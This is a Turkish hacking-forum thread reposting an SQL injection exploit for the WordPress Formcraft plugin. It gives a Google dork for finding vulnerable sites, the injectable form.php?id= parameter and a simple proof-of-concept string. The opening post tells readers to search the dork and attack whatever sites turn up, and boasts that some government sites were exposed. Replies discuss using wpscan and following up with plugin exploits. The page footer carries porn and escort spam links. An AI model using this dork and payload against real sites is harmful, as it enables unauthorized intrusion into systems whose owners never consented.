KULLANICI ADI : ŞİFRE Şifremi Unuttum*

Anasayfa İLLEG4L BANK KREDİ SATIN AL İLLEG4LİZM RAP Sub Domain Bulucu Arama Yap Yeni Konular Bugünki Konular

Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Wordpress Formcraft Plugin Exploit
Konu : Wordpress Formcraft Plugin Exploit - 04.02.2014, 19:08
Mesaj: #1
Wordpress Formcraft Plugin

# Exploit Başlığı : Wordpress formcraft eklentisi-Sql İnjection
#
# Exploit Sahibi : Ashiyane Digital Security Team
#
# Google'da Aranacak Dork : inurl:/wp-content/plugins/formcraft
#
# Yazılımın işe yaradığı web tabanlı uygulama : WordPress › Blog Tool, Publishing Platform, and CMS
#
# Test edilen Sistemler: Windows , Linux
#
# Tarih: 2013/12/2
#
#############################################
# Exploit : Sql Injection
#
# Bulunduğu yer(Gösterim)
[Hedef site]/wp-content/plugins/formcraft/form.php?id=[Sql]
#
#
#
# Exploit-DB Note:
# A PoC: form.php?id=1%20and%20 1=1
##########################################

############################Anlatım############### #############
Google Dorku googleda aratın ve de çıkan sitelrerden birine tıklayın.Çıkan sayfa Sql açıklı sitedir.Gerisi size kalmış.İlk çıktığında birrkaç devlet sitesinde dahi açık vardı.
 

 

(Son Düzenleme: 05.02.2014, 12:25, Düzenleyen: GigaH3rtz.)
WWW Alıntı ile Cevapla
Konu : Wordpress Formcraft Plugin Exploit - 08.12.2014, 15:43
Mesaj: #2
teşekkürler

Alıntı ile Cevapla
Konu : Wordpress Formcraft Plugin Exploit - 21.06.2015, 12:19
Mesaj: #3
Öncelikle teşekkürler...

Kali linux 'da wpscan komutu ile herhangi bir siteye plugin taraması yaptığım zaman çoğunda "admin.php" ye kadar ulaşıyorum fakat o dosyayı açamıyorum.Sizce bunun sebebi ne olabilir?


Veya pluginlere ulaşabildikten sonra hangi yolu izlemeliyim?

Şimdiden teşekkürler...

WWW Alıntı ile Cevapla
Konu : Wordpress Formcraft Plugin Exploit - 11.08.2015, 02:39
Mesaj: #4
31 
(21.06.2015, 12:19)fagelheim17 Adlı Kullanıcıdan Alıntı: Öncelikle teşekkürler...

Kali linux 'da wpscan komutu ile herhangi bir siteye plugin taraması yaptığım zaman çoğunda "admin.php" ye kadar ulaşıyorum fakat o dosyayı açamıyorum.Sizce bunun sebebi ne olabilir?


Veya pluginlere ulaşabildikten sonra hangi yolu izlemeliyim?

Şimdiden teşekkürler...

Ban yemişsin ama gene de yazayım belki bir başkasının işine yarar. Uzaktan tarattığın her dosyayı açabilecek olsaydın veritabanı bilgilerini wp-config.php gibi dosyalarda saklamanın ne anlamı kalırdı? Bu tür dosyalara çoğu zaman yerel olarak ulaşsan dahi karşındaki işi biliyorsa şifrelemiştir. (Çözülmesi ap ayrı bir konu.) Pluginlere ulaştıktan sonra da o pluginlere ait exploitler ile işi bitirmeye çalışırsın.

WWW Alıntı ile Cevapla


Hızlı Menü:


Konuyu Okuyanlar: 1 Ziyaretçi
hd porno antalya escort türk ifşa porno izle türk ifşa porno samsun escort izmir escort ataşehir escort türk ifşa hd porno